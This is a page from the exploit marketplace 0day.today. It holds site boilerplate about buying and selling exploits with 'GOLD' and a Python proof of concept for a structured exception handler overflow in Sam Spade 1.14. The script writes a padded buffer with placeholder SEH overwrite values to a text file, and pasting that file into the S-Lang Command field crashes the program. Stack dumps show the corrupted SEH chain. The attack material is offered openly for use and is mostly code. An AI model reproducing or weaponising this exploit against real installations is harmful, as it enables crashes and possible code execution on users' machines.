0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sam Spade 1.14 - S-Lang Command Field SEH Overflow Exploit
#!/usr/bin/env python # Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC # Discovery by : Nipun Jaswal # Email : mail@nipunjaswal.info # Discovery Date : 12/11/2015 # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Tested Version : 1.14 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS : Windows XP Professional SP2 x86 es # Crash Point : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket ########################################################################################## # -----------------------------------NOTES----------------------------------------------# ########################################################################################## # And the Stack #00FBFE80 41414141 AAAA #00FBFE84 41414141 AAAA #00FBFE88 42424242 BBBB Pointer to next SEH record #00FBFE8C 43434343 CCCC SE handler # After the execution of POC, the SEH chain looks like this: #Address SE handler #00FBFE88 43434343 #42424242 *** CORRUPT ENTRY *** f = open("sam_spade_slang_dos.txt", "w") Junk_a = "A"*528 nseh= "B" * 4 seh= "C" *4 f.write(Junk_a+nseh+seh) f.close() # 0day.today [2024-11-15] #